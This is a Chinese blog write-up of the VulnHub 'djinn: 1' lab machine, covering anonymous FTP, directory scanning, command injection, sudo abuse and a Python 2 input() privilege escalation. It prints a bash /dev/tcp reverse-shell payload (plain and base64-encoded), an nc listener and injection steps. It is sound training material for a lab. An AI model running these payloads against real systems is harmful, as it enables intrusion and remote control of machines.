vulnhub djinn: 1

已于 2022-05-26 22:17:00 修改
阅读量603 收藏 2
点赞数 2
分类专栏: vulnhub 文章标签: 安全 base64反弹shell man uncompyle6 pyc反编译
于 2022-05-26 22:16:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124993805
版权

渗透思路:

nmap扫描----匿名登录ftp----gobuster扫描网站目录----利用RCE getshell(payload需要base64编码)----寻找敏感信息切换到用户nitish----sudo切换到sam(善用man命令)----sudo提权到root(使用uncompyle6反编译.pyc)

环境信息:

靶机:192.168.101.67

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.68

扫描到21(ftp)、22(ssh)、1337、7331(http)端口

2、匿名登录ftp下载文件

登录ftp,用户名和密码都是anonymous

ftp 192.168.101.68

下载文件

ftp> get creds.txt
ftp> get game.txt
ftp> get message.txt

在攻击机上打开下载好的文件,内容分别如下

creds.txt

nitu:81299

game.txt

oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the

final level and get the prize.

message.txt

@nitish81299 I am going on holidays for few days, please take care of all the work.

And don't mess up anything.

3、gobuster扫描

用gobuster扫描7331端口网站目录

​gobuster dir -u http://192.168.101.68:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

扫描到/wish和/genie

4、利用远程命令执行getshell(base64)

浏览器访问http://192.168.101.68:7331/wish,发现可以执行系统命令

比如在输入框中输入whoami

提交之后跳转到http://192.168.101.68:7331/genie?name=www-data%0A,虽然页面看起来没有显示命令执行结果,但其实url参数值已经包含了whoami的执行结果www-data

可以利用这个命令执行功能获得反弹shell

经尝试,这边bash反弹shell需要base64编码,具体方式如下:

先在攻击机上输入

echo "bash -i &>/dev/tcp/192.168.101.34/8888 <&1" | base64

得到bash -i &>/dev/tcp/192.168.101.34/8888 <&1的base64编码

再组合成下面的payload,也就是在靶机上将YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg==进行base64解码之后再执行

echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg== | base64 -d | bash

攻击机上nc监听8888端口

nc -nlvp 8888

http://192.168.101.68:7331/wish页面Execute框输入payload:

echo "YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg==" | base64 -d | bash

攻击机上得到靶机www-data用户的反弹shell

5、切换到用户nitish

进入到/home目录,发现有两个用户nitish和sam

探索nitish用户的家目录,在/home/nitish/.dev/目录下找到creds.txt,其内容看上去是nitish的用户名和密码

nitish:p4ssw0rdStr3r0n9

使用nitish用户进行ssh登录,密码是p4ssw0rdStr3r0n9,登录成功

ssh nitish@192.168.101.68

6、sudo切换到用户sam(善用man)

nitish的shell下输入

sudo -l

发现可以以sam用户身份执行/usr/bin/genie

尝试以sam用户身份执行/usr/bin/genie,命令行输出了使用方法提示

sudo -u sam genie

根据使用方法提示执行/usr/bin/genie,结果命令行一直是下图这样的回显

sudo -u sam /usr/bin/genie -g -e /bin/bash wish

用strings命令查看/usr/bin/genie中的可读字符串,发现genie.py

strings /usr/bin/genie

查找一下genie.py在哪儿,也许可以通过阅读源代码发现什么。

whereis genie.py

很可惜没找到genie.py,但是发现genie似乎有man文件

用man命令查看genie的详细信息

man genie

发现有一个参数命令行提示没有提及,-cmd

以sam身份执行genie的时候加上-cmd参数,不过参数后面还要再加一个随便什么字符串作为参数值

sudo -u sam genie -cmd a

得到sam的shell

7、sudo提权到root(.pyc反编译)

在sam的shell下执行

sudo -l

发现可以以root的身份执行/root/lago

尝试以root身份执行/root/lago

sudo /root/lago

发现有4个选项,选择每个选项后的反馈是下图这样。一开始以为有用的选项是3,也就是读文件,但连/etc/passwd这个文件root都没有权限读?这也太骗人了吧

摸索一圈之后,在/home/sam下看到了.pyc

查看该文件中的可读字符串

strings .pyc

可以明显看出来该文件和/root/lago应该是实现相同功能的

把.pyc拷贝到攻击机上分析

靶机上起http

python2.7 -m SimpleHTTPServer 8080

攻击机上wget下载.pyc文件

​wget http://192.168.101.68:8080/.pyc

使用uncompyle6反编译.pyc

uncompyle6 -o lago.py .pyc

lago.py的内容如下

# uncompyle6 version 3.8.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.9.8 (main, Nov  7 2021, 15:47:09) 
# [GCC 11.2.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())

阅读代码可以发现,确实只有'2 - Guess the number'有突破口,满足if s == num就可以得到shell。

仔细观察guessit()函数定义,发现在进行if s == num判断之前并没有对输入进行过滤和转义。而在python中,虽然input()函数接收命令行的数字输入时会将其自动识别为数字,但当其接收字符串输入时,必须将字符串框在引号中才能被其识别为字符串,否则当作变量处理。可以做简单的测试:

也就是说,只要在命令行输入num,if语句就变成了if num=num,就是真,就会触发system('/bin/sh')执行,从而获得shell。

可以先在攻击机上简单测试:

靶机上执行

sudo /root/lago

选择2,然后输入num,即可得到root的shell

/root/目录下有个proof.sh,执行后得到flag

仙女象
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
djinn:Djinn分割键盘
04-11
为了安全起见,它在USB连接器和分离式传输连接器(rev2 +的USB-C,rev1的TRS)上均具有ESD保护,瞬态电压抑制和极性保护。 它还运行 ! 只是....还没有在主仓库中。 不幸的是,Djinn当前在QMK的主版本中不受支持...
djinn:一种可视化工具,可在任意组的jar,类,包和Java项目之间创建依赖关系图
05-26
djinn,Java依赖浏览器 描述 一种可视化工具,可在罐,类,包和Java项目的任意集合之间创建依赖关系图。 Djinn可以用来: 分析不依赖于依赖管理系统(例如maven或ivy)的旧代码库,然后生成有助于迁移到这些系统的...
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1120
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
Vulnhub靶机渗透 -- DJINN: 1
miko's blog
11-03 298
Vulnhub靶机渗透 — DJINN: 1 0x00 前言: 介系一个及其简单的靶机 非常适合新玩家对她进行渗透 (可以从这里下哦) 啊是的没了,就这些 0x01 信息收集: 进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了 简单地用nmap扫描一下能够获得大部分内容 可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对 由于
Vulnhub靶机:DJINN_ 1
LainWith的博客
02-03 1673
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
vulnhub-djinn1
KAKA的博客
07-14 443
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
Vulnhub-靶机-Djinn 1
qq_43264813的博客
01-28 415
Vulnhub—靶机—Djinn 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/djinn-1,397/ 文章目录Vulnhub—靶机—Djinn 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.168.110.132 【步骤二】发现开放了21端
靶机系列测试 djinn1
08-03
【靶机系列测试 djinn1】是一篇关于虚拟机安全测试的教程,主要针对初到中级水平的用户。这个靶机兼容VirtualBox和VMWare,可以通过DHCP自动分配IP地址,用户可以在登录界面直接看到IP。挑战的目标是找到并读取两个...
开源项目-thrisp-djinn.zip
09-05
开源项目-thrisp-djinn.zip,Djinn 1.0: html templating built on standard library html/template
PyPI 官网下载 | djinn_forms-1.2.2.tar.gz
01-31
标题中的"PyPI 官网下载 | djinn_forms-1.2.2.tar.gz"指出这是一个在Python Package Index(PyPI)上发布的软件包,名为`djinn_forms`,版本为1.2.2,其分发形式是tar.gz压缩文件。PyPI是Python开发者发布自己软件包...
Oracle11g-RAC环境下多个Scan-IP的修改方法.docx
10-29
本文详细图文介绍了在oracle rac环境下多个scan ip的修改方法,保证能修改成功
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2048
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 905
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
vulnhub靶机 djinn1
witwitwiter的博客
09-10 3627
vulnhub靶机 djinn:1 靶机地址djinn: 1 ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report f
djinn 1:针对1337端口的自动化脚本
weixin_52641450的博客
02-17 200
djinn 1:针对1337端口的自动化脚本
靶机测试djinn笔记
qq_56426046的博客
01-13 437
函数将传入来的字符串进行条件判断,如果满足以下条件等于 true 返回并且不会这些下面语句。翻译 哦,我忘了告诉你我在 1337 号港口为你准备了一个游戏。发现可以不需要密码执行 root 用户下的/root/lago 文件。这是 python flask 框架的 app.py 文件。帮助文档告诉我们可以执行 shell 经过测试均不能执行。通过这份源码 可以判断与 root/lago 文件一样。当 s 等于 num 会这些执行/bin/sh。
分布式文件系统MinIO对象存储服务
yuzheh521的博客
01-13 3026
MinIO 是一个非常轻量的服务,可以很简单的和其他应用的结合使用,它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等。它一大特点就是轻量,使用简单,功能强大,支持各种平台,单个文件最大5TB,兼容 Amazon S3接口,提供了 Java、Python、GO等多版本SDK支持。官网:https://min.io。
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2755
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
MinIO文件系统
最新发布
Relievedz的博客
02-20 3039
Minio使用纠删码技术来保护数据,它是一种恢复丢失和损坏数据的数学算法,它将数据分块冗余的分散存储在各各节点的磁盘上,所有的可用磁盘组成一个集合,上图由8块硬盘组成一个集合,当上传一个文件时会通过纠删码算法计算对文件进行分块存储,除了将文件本身分成4个数据块,还会生成4个校验块,数据块和校验块会分散的存储在这8块硬盘上。由于硬盘分布在不同的节点上,分布式Minio避免了单点故障。中文:https://www.minio.org.cn/,http://docs.minio.org.cn/docs/
DJinn1靶机教程:初阶到中阶的网络安全挑战
Djinn1靶机的下载地址可在VulnHub网站上找到,操作系统为Linux。在进行靶机测试时,首先需要进行信息收集,这通常包括端口扫描。 **信息收集** 信息收集的第一步是使用nmap工具进行全面扫描,例如执行`nmap -p --A ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值